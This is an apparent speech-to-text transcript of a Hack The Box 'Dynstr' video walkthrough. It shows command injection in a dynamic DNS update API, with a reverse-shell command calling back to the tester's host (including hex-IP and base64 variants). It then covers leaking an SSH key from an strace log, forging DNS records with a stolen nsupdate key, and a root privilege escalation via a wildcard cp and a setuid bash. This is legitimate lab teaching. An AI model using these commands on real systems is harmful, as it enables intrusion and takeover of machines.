HackThebox - Dynstr

Key Takeaways

what's going on youtube this is ipsec i'm doing density from hack the box which was an amazing box that showcased the power of dynamic dns jkr did a really good job at mirroring the api no ip uses so you can use the same commands that you would to update your dynamic dns on like no ip dynamicdns.com on this box however when he cloned the api he introduced a command injection vulnerability so within the dynamic dns update you can actually get code execution on the box to get a shell on it once you have a shell on the box you poke around you can find a ssh private key but you can't log in because the authorized key file specifies you have to come from a specific dns name and the dynamic dns key that's on the box does not have the ability to create that dns name so you perk around the config find the correct key you can then now create that hostname and utilize the private key so with all that being said let's jump in as always we're gonna start off with the nmap so dash sc for default scripts sv enumerate versions oh a i'll put all formats put in the map directory and call it dinster and then the ip address of 101010 to 444. this can take some time to run so i've already ran it looking at the results we have just three ports open the first one being ssh on port 22 and its banner tells us it's um ubuntu server and furthermore based upon 8.2 p1 and for ubuntu 0.2 we can guess this is going to be ubuntu bionic so if i just go google here and type for ubuntu o2 and search launchpad we can see launchpad's like ubuntu's package repository but we can see it's only uploaded to ubuntu focal which if we scroll down after selecting focal that is ubuntu 20. if this did say like 76 p1 instead of that 8 two chances are that would be a ubuntu bionic which i think is version 18. clicking on bionic scrolling down that would be yes 18. the other thing we can get from that is this package was released on january february march 10th which is about seven months ago so this box at time of release was relatively up to date so chances are there's no cves and a package that's managed by apd so let's take a look at the other things we have 53 open and nmap's telling us that is dns and the banner confirms it is dns and it being on tcp and not udp well it is also on udp but i only scan tcp the fact that dns is listening on tcp means i'm probably going to want to look at things like dns sec or zone transfers big key on the zone transfer because it's easier to enumerate we just can't begin enumerating it until we know what zones this box supports and a zone if you don't know would be like dinster.hdb if we knew that was existing on this box we could do a zone transfer like dig ax fr at 10 10 10 244 denster.htb um it says transfer failed so that does not work but that may not be the actual zone so we'll just resume once we actually enumerate zones of this box the next thing we have is 80 which is on http and that is just running apache so let's go take a look at apache so 10 10 10 4 and we get dyna dns it's a home page and says awesome dynamic dns and suddenly the um box listing on dns is making sense so scrolling down we can see the services and it's talking about how it's a provider for dynamic dns and it has the same api as noeip.com which i actually use a lot um if you don't know what dynamic dns is essentially it's just a short-lived dns name where your computer uh pulls to and it's a short updated um it stays for much longer but anyways it's a way to get your ip address to a dns name and keep it in case your ip changes now i like this because my edge firewalls can resolve dns names so like iptables and pfsense support it i know palo alto pretty much everything supports weight listing a dns name so my laptop is has a dynamic dns and my pf sense box at home will white list certain ports for that laptop so if somehow i lock myself out of the vpn remotely well i can ssh directly into my firewall from my laptop now the dangerous thing with that is if i ever go to like a conference and use hotel wi-fi my dynamic dns updates the hotel's ip address anyone at that hotel now has a reverse lookup to my domain name and could access port 22 of my firewall so there are some downsides to doing that but um i really hate being locked out of my home network so that's why i have that there but that's a complete big tangent let's talk about this box so we probably should look up the api for node ip because it's giving us a few zones right here we have dns alias dot hdb dynamic dns.hdb and no ip so the very first thing i want to do is test some zone transfers so let's go back to that dig and i'm going to test each of these to see if we can extract any extra names a zone transfer on a dynamic dns provider would be a pretty bad day so we can just look at these and it looks like nothing is leaking or all these don't have anything um since it says transfer failed and not like zero results i'm gonna guess zone transfer is not enabled uh we can see it's running in beta mode and it has a username and password din dns is a username and dns backwards is the password it has statistics and previous clients so um also has an email dyna.htb so we could try testing dynamic dot hdb to see if we can zone transfer that we can't so let's go look up no ips um apis and it says they use the same one so i'm just going to google no ip api go to google and we can see it says integrate with it and how do we do it so it's doing an http request username call and password at noip dot com slash nic update and specifying the hostname and ip address so if i send this and we change it to um let's see actually the very first thing i want to do is just go to slash nick and see what happens so if i go to 10 10 10 244 slash nick we get a blank page if i do slash please subscribe we get not found so we know slash nick does exist and then the next thing we could do is update and see if update exists and it says bad auth so now we want to test username and password so what we can do is let's go back to the home page and or i can just type it but it was dns there's a username and then dns backwards as the password so let's specify um let's just do this in curl so curl then dns like that at we should specify http put in quotes 10 10 10 244 slash next slash update question mark i think it's hers or is it hers name um first name first name is equal to please subscribe if i can spell i always think about that one dot ipsec dot rocks and ip is equal to 10 10 14 8. so we can see if we can register something and we get bad auth that's weird i wonder if that's not how we specify username and password or did i type or something dyn dns is it like something different oh dyna dns there we go so now we get wrong domain ipsec.rocks so if we go back to this page it supports a few aliases so we have dns alias.hdb dynamicdns.hdb and no dash ip.hdb so let's go and take a look at this so i can say um hostname is equal to ipsec dot dynamicdns.hdb and it says good so if i now go ns lookup say the server is 101010 44. and we try do ipsec.dynamicdns.htb it resolves to me but i don't know exactly what this did uh we could furthermore try that zone transfer so um this is down here here we go and we called it dynamic dns.htb still can't do a zone transfer so i don't know exactly what we have here we can try just doing various bad characters see if we can enumerate anything i'm gonna put like an exclamation point and before i do bad characters let's put it in single quotes and we have ns update failed and ns update if we google exactly what this program is we'll see it's um a dynamic dns update utility so we know it's using dynamic dns to update uh we could test for like command injection so i'm gonna try sleep plus one and we don't get anything however i think we need to ur i'll encode this i'm going to try backticks to see if that gets around it and it's looking like it's taking a bit longer so we can do time and this curl so takes two seconds with that sleep in we can put sleep zero and it's instantly if i do sleep two i'm guessing will be like three or four seconds so we have confirmed we have some type of code injection so easier way to work around this instead of living in the command line is just send this to burp so at this point i'm going to do dash p for proxy http localhost 8080. uh there's a dash dash proxy there we go that looks better so let's go to proxy send this into the repeater tab and we can confirm it's still working it's waiting on the request and we should see within four seconds it comes back we do sleep zero it works almost immediately and the reason why these semicolons weren't working is because in um i don't know exactly if we url encode these do they work control u ns update failed so for some reason oh because we're probably breaking the code so we do semicolons and then that let's see semicolon semicolon let's encode this it failed let's put a comment still i'm not sure exactly why we can't use semicolons must just be a bad character or i'm screwing something up that's why i always test for multiple ways to do something so right now i am testing a different code execution technique i'm just highlighting these to make sure i don't have to url and code it and it looks like we can insert commands via backticks or this way so two different ways we can do it it looks like we just can't like break out of the command with a semicolon so the next thing to do is try to get a reverse shell so i'm going to try bash dash c then bash dash i dev tcp 10 10 14 8 slash 9001 0 and 1 like that and then let's url encode this payload we can listen on a port so nc lvmp 9001 and we send the payload and it does not work we get wrong domain 10 10 14 8 9 000 1. so what i'm going to try to do is i'm going to add a few characters here so if i now uh by adding two on this side i'm testing if there's some type of truncation going on it only accepts a certain number of characters so i'm expecting if it does truncation i won't see ten it'll begin with dot 14.8 and that's not what happened it just still says 10.14.8 so now i'm guessing there's some type of delimiter in my actual command and i'm looking at this and we have periods and it's using periods to identify domains so chances are putting all these domains is what broke it uh we can kill this reverse shell real quick and i think i can show this a different way so if i do ipsec.dynamicd like this it lets me create this record right but if i try doing a sub domain if i make ipsec a different domain like test we get wrongdomain test.dynamic.dns so the code is valid and we only have three levels and our domain is the i don't know if it's upper or lower level in dns but the subdomain is what we put so we can't do four levels and by doing 10.10.10 it's treating each of those as a subdomain or whatever it's called and that's why it's failing but lucky for us ips can be defined in many different ways my favorite way to define ip is hex so we can just do ip to hex go to google and if you don't know um check out the holiday video it's a good old one it's my first box i actually solved on hack the box that goes over this type of encoding but i'm just going here converting it into hex and we can do this so 0a and hex is 10 or a is 10 so it's probably better to do it here um this clipboard there we go so it's represented as dot 10.10.10 dot wait oh no this is fourteen zero e dot eight yep ten ten fourteen eight i was reading this as zero a for whatever reason but yeah so ten ten fourteen 8. so i'd even need to go to the website to encode that if i just like thought about my octet a little bit so let's do 0x 10 10 14 8 and we should listen on 9001 and see lvmp 9001 and send this that did not work oh let's see 0x 10 10 14 8 9 000 1 0 and 1. i think that should have worked let's try and backtext and that's update failed so what i'm going to do here is i'm going to unurl and code this and look at the payload i don't have a single quote here i wonder if that was it ctrl u there we go it was me doing a bad payload i did not have a single quote if i did not spot that with the i what i was about to do is just copy this entire thing so if i copy that whoops let's copy and i paste this into terminal uh i'd see this and then where i'd be like oh i forgot the single quote so that's what i was doing i wasn't positive if i could actually use an ip this way and if i had to work around this and i couldn't specify ips this way i would probably resort to a like base64 payload so if i do the same shell that i did and we just say echo see if i echo that that's good i actually don't need the bash josh c doing this and we can get rid of the hex so 10 10 14 8 okay so base 64 w0 and then we could do echo dash n this base64-d bash so we could try something like this i'm actually not positive it's going to work i assume it is but that's why i always like testing multiple things because if it doesn't work after i solve this box i'm probably going to debug exactly why it failed so i just know in the future so we can try doing that payload and then again we have to url and code it send it and we just get ns update failed do i have because i had an extra quote but it works that way too so there's two different ways you could bypass whatever filter it had or that period being a bad character so let's go continue along on this box i'm going to do python3 dash c import pty pty dot ben bash control z stty raw minus echo fg enter enter and then export term is equal to x term so i can clear the screen so very first thing i always like doing when i get into web directory is looking at the source to see if there's any type of credentials i don't know what this attribution.txt is um so i think this is just some type of credits linking where they took all the images from nice to see people giving credit uh it's just putting blank index.html so you don't have directory listing enabled so if we remove that file can we do that no because it's owned by root uh or do we own the directory nope it's owned by root but if we removed this file then we went to um slash neck it would just have the directory listing enable and show us that update is a file if i look at update it is file update a php script so that is ugly um let's do base 64 update actually cat update nc 1010 14 8 9001 and over here nc lvnp 9001 to update dot php okay control c that them update.php and now we can view this a bit better that's still weird how it has all those bases but okay uh server php off password set so this is the um h uh like thin dns then dyna dns or the username password we use that's what this is pulling okay so this is saying if these passwords aren't set and then checking if they're equal to um then dns and then dns backwards so that's what that is let's see this is a filter validate ip so right here the script is checking if um the zone is either these three and if it's not that's going to exit with that wrong domain thing and then here we're doing a update dns entry so it's setting the server to localhost sending the zone update deleting the entry and then adding the new entry and one of these i'm guessing is user controlled let's see um h i'm guessing h is user controlled so what i'd probably do here to analyze it is i take update.php and i'm going to grab this i'm going to do php dash a and we can say list h actually i wonder if yeah i think they did list h d and after i type this out i know it's host name and domain but let's do root.ipsec.rocks if we specify that and then print h it should be root and then d is ipsec.rocks so that's how we know exactly what that code is doing and since h we fully control this is where we're actually doing the command injection so let's see sd next one this is going to be um host.domain so this is where we're injecting right here and also injecting right here because it uses h again but yeah we just have command exact execution in here which is a system command hopefully that makes sense then we have this etsy bind dns key and because we have it doing the checks in the script right off the bat i want to see if i can create other entries so i'm going to copy this and we can try going back to a shell and we can do um what is it ns update and then oh actually it's not s update we have to specify the key so key and that's the wrong clipboard oh god and that's update dash k and it should be let's see key etsy bind dns key okay so we kind of just mimic exactly what it does so the first thing is server 127.001 then it's setting the zone to percent s so let's see that would be h so this is going to be let's do dynadns.hdb which was the email and we can do the next add ipsec.dina dns.htb was that actually a loud one i don't think it was no it was not one of those allowed so add 30 in a let's see the next one should be ip address so 10 10 14 8. so this is the record to add and at the end we specify send and it says not auth so we don't have permission to add this record to this zone so it looks like the bind key that we're using is specific to the three zones up here so let's try the same exact command instead of dyndns we can do no ip.hdb send wait not off i thought i could do that i have no clue how this program is working let's see do i need that t1 so t1 maybe we need that copy paste send i wonder what t1 is let's try the other one dynadns oh it's probably because i had set the zone earlier and i did not set the zone to no ip so let's try this again and instead of ipsec we'll do ipsec 2. and it doesn't work so it looks like that was definitely related to me setting that zone command so let's try ipsec here send so that works let's add it to this record and it looks like it just hangs when we try to update this dyna dns zone maybe it's the second time we're updating so i'm just going to sandy to check this so let's just make sure this is the very first thing we send and it still just hangs here so i don't think we can update um that zone and again at this point don't know what it would buy us oh there we go response to soa query was unsuccessful so we know it did not work but at this point it doesn't matter because all we're doing is testing a key that we saw in the web server so the next thing i do is more recon on this box so let's go into the home directory and we can see we can go into both of these so let's try checking out the dyna directory and this is empty and they don't have any files let's look at bind manager and we have a few folders so by manager is set only that user can read we're dub dub dub data so we can't read that user.txt but we can go into.ssh and we have an id rsa but we can't read it there is authorized key in this id.pub file we can cat authorize keys and we can see from a specific domain they can use ssh so right now we're looking for the id rsa key i'm going to check this support case folder and we can see a few commands so i'm going to cat each of these files and see what they have and that is an ugly thing that just did a bunch of stuff spewed to the text but i do see a ssh key and looking up here we have open at uh current working directory home bindmanager.sshidrsa so it is leaking that key and i'm guessing this dot script output each of these files or something because that was the output of an s trace so if i cat s trace and we go up we can see the key is there too and the reason why i knew is s trace is because of just printing out the system call traces the s stands for syscall or maybe it's system trace but that's how i remember it let's copy this key so i'm highlighting this all copy and then we can create the key here so what's v bind mgr paste the key and then we just need to do a quick search and replace so backslash n i did two backslashes because i gotta escape the first backslash and i'm going to replace that with a return does that work looks like it does and we have a pretty ssh key now the one thing that a lot of people do when they copy and paste and it's super annoying but let's go back up here if i just had copy and pasted by oh weird i can't click and highlight um reset can i highlight i think catting that one file screwed up my terminal so i can't do it i'm not sure you can hear my mouse clicking but i'm trying to highlight this text but anyways um because we're in this weird copy mode if i try to highlight this text it's going to copy these line breaks here as well when it should not copy the line breaks so you'd have an extra characters filter out and vi so it's always easier and tmux to copy by going into the copy mode which i hit space i'm not sure if that's default i don't think it is because i think default is emax mode not vim but if you watch my tmux video it goes over how i do this copy and pasting but i digress so let's try logging in with this so sh dash i bind manager bind manager at 10 10 10 2 4 and we can now the first step i do is quickly validate my key i can see the fingerprint i'm validating with is this jn1 we can let's do ssh keygen is it dash l bind mgr uh let's see how do i validate fingerprint hash i think i need a dash f for input file so dash l dash f oh i think the first reason i couldn't log in is it was an unprotected key file so still can't log in but if i look at this fingerprint it is jn plus whatever let's go over to the ssh directory i'm going to cat id rsa.pub actually yeah cut that and cat authorized keys and we can see the dot pub key is the same as authorized keys we just don't have that from yet so i'm going to copy this public key so copied it let's v sh dot pub i actually called it bind manager so it's bind mgo.pub just stay a little bit organized i do sh keygen dash l k bind mgr and then we can do dot pub and we see these fingerprints are identical so we know we have the right ssh key and again that keys fingerprint is also sent with ssh so if i do that sh dash iv thing this is bind mgr you can see ssh is sending the fingerprint of each key it has and then getting this one which is the last one and then failing but that is how ssh keygen authentication works it takes all your public keys that you have in your box sends them the fingerprint and if the fingerprint can continue then it sends more information um forget what box we went over ssh handshakes and depth but if you go to ipsec.rocks i'm sure you can find it if you want to learn more about the ssh handshake but right now we're on a mission to create that dot infra domain name so if we cap this authorized keys we know we need.info.dina.hdb so what i'm going to do is i just want to put that down here because my clipboard is acting funny so in case it goes off my history i know exactly what i want i'm also going to put that in a copy so let's go back to verb dub dub html uh neck and we can try this update again so if we cat update we want to do a ns update dash etsy bind ddns.key and then we wanted to update add ipsec.infra.dina.htb and a uh we need 30 n a 10 10 14. i think that has to be capital eight looks good send and it's actually refused so if we do it to a domain that it doesn't know about it sounds refused um the last time it had just said it couldn't look up because this box probably has no record of what dyna hdb is so that's probably why that last look up failed which is funny because that's the oh i don't know what i was doing earlier but that is what i was expecting so we get this refuse message so the next thing we can do is look for more ssh keys and i'm going to reset again okay because my tty was screwed up and i couldn't do things so i'm going to go into the bind directory and look at other keys and we have this ddns.key which is the one we use but we also have info.key so if i look at infra dot key we can see we can read this one as well i'm just going to cap both of these and we can see it is a different key but the same exact type so i'm going to do this ns update command again instead specify ddns.key we'll specify infra.key and it was um i think add ipsec dot infra dyna hdb 30 n a [Music] 10 10 14 8 send and now we have a lookup so if i do a ns lookup server 101010 244 ipsec.infra.dina.hcb it returns back to me so let's try ssh again so sh i bind manager um bind manager at 10 10 10 244 but we still can't get in and the reason why we can't is because um ssh also depends on a reverse lookup and reverse lookups if we just do um 10 10 14 8 to the server or in this like in addr.arpa thing and each of these is going to be a zone and this is just the ip address and reverse order so what i want to do is create a reverse lookup see can i do this off the top of my head so add 8.14.10.10.n dash adr dot arpa 30 n and it's a ptr lookup that's not right um i don't think it's ipsec.info.dina.htb is it is this it send oh 10 10 14 8. hey i did it right so now we have this reverse lookup that is pointing to um ipsec.infrared.net.hdb and we've also created that record so now when i do the same ssh command we get in and again that's because we have satisfied this criteria of being on the infra domain so now the next bet is oh and if you were using like no ip and you wanted to like secure your home with this you could point your um look up to be like yourhurstname.dendns.com and then your ssh key will only work when you have that dynamic dns record set to the correct ip so that is something cool and another thing about that may not want to do it because they'll only work when you're like externally and you have a wan address but if you're trying to ssh into a local box you're going to ssh in and your ip's probably going to be like 192.168.1.2 but your record.info.dyna.hdb records going to be the win address so you'd have to do multiple froms here to allow your local subnet to also be allowed um i hope that makes sense but the next thing let's see we're that user so we can check sudo shell and we can see we can run this script with no password so i'm going to do vi local ben bind manager dot sh did i type or something i did loca local and i still don't have syntax highlighting because vim is not installed okay so i'm just going to send this file back to my box so nc 1010 14 8 9001 and the reason why is i just like to have um syntax highlighting this is bind mgo.sh i need to do lvnp see there we go you can tell like the longer the video goes the more mistakes i make just because it's like mentally taxing to talk and type at the same time come on dot sh there we go so now we have syntax highlighting so what this is doing is it's checking if the file.version exists and if it doesn't exist it's going to exit with 42 and then it's going to check if let's see it's going to get the contents of version and check if it's less than the contents of bind manager directory.version and if it is less than it it's going to exit with 43. and that bind manager directory is up here so it's etsy by named bind manager so the next piece here it's going to do for file and print out each file and then it's going to stage files with this cp command and it's using a wildcard here so this is where the actual exploit exists is because it's doing a wildcard and how a wildcard works in bash is it just takes every file in that directory and puts it in as you typed it in the command so if you had a file that was like dash dash root me and if you specified this argument it worked um then cp would treat this as the argument that was a bad example um let's let's do uh cd dev shm we can go in here and do touch and we can say does not exist if i do ls we can see that file and we can do touch please subscribe if i do ls now we can see we can see both those files if i do ls star we actually get a error message because the star treated this as an argument which yeah does not work it just thought we typed this command it does not exit i didn't even say exist but this is what it thought we typed if i did that correctly and put the e there so that is why that matters and cp does have a preserve flag let's see preserve equals all let's see dash p let's see don't preserve well that's what we want but it's not telling us everything um the mode is specifically because that's going to be like the permissions ownership we don't want to preserve and timestamps doesn't matter what we're getting what i'm getting at here is when i do sudo i am now the root user so if it does a copy it may be the owner of itself we can actually just show you let's see let's remove does not exist does that work rm does not exist no it's such a pain to remove these files escape escape uh does not ex i think i type in and forgot the t there let's see rm dot slash does not exit there we go removed it i typed that file so that's probably why we're screwing up or maybe the dot slash is what saved me um but it's how you can delete those i guess so let's add the uh i guess let's not add any flags real quick so let's do touch file or we can echo one two dot version and then chmod all sevens on please subscribe so if i look at that bind manager owns it and it's got all the bits turned on so let's now run that pseudo command so sudo user local bin bind mgo.sh and let's look at bind etsybindnamd.bindmanager we can see the permissions are whatever the umass is so rwx are xrx and the root the owner is root and bind so we want to preserve the owner i wonder if we can just do dash b then because we're going to preserve everything so oh we we don't want to preserve the owner because if i do touch dash p i'm sorry it's been a long day but now if i run this command again and we're going to have to update the version so echo2 version and run that sudo again lsla etsy bind named bind manager we preserve the earner so the earner now is us uh we don't want that we want the earners still to be root so if we do man cp preserve let's see attribute list does it have attribute list attr l see default is mode ownership timestamps i wish it told me what mood and everything meant i guess i have to do a lot of googling or check a different man page to get what a tribute list is but we're in a preserve mode so instead of dash p i want to do dash dash preserve equal mode so now when i run the same sudo etsy bind name i wonder why i could do that because i didn't update the version oh well but we can see root now owns the file and it kept our special bits so what we can do now is copy bin bash to a directory and because we own this directory or we own the file we can do chmod 4755 on bash and now when we look at the permissions it is a set uid binary which means it will allow us to execute the set uid command which would escalate us to root only if root owned this binary so if i do bash with dash p now uh it doesn't do anything because root doesn't own this binary however by doing this suitor command where is sudo let's just pseudo now i do lsla etsybindnamd.bindmanager we now have bash with that set uid bit and root owns it so all i have to do now is do bash dash p here if i don't do the dash p um it's not going to do anything so i've specified dash p and i do id my effective id is root so i go into root and we can now read root.text if you're curious what that dash p actually means i am too i just muscle memory so let's look at exactly what dash p is see if the shell it's not supplied let's see the shell has started with the effective user group id not equal to the real user and the dash p option is not supplied whatever i wonder what dash p means it's not posix c equal that's not it i actually don't know what the dash p means um let's just google real quick what does dash p argument mean and bash let's see that's not it let's google explain bash and let's try bash dash p uh question mark i know this flag is unique to some distros so um yeah i'm not sure exactly what it's supposed to mean i guess maybe the district did not update the help all right really i'm drawing a blank dash p posix i don't think it's dash dash proziks let's just exit a few times id p-o-s-i-x yeah so i'm not exactly sure what that dash p means but i'm sure if you check the comments someone will let you know because i'm sure someone out there that watched the video knows exactly what dash p means but anyways take care guys and i'll see you all next week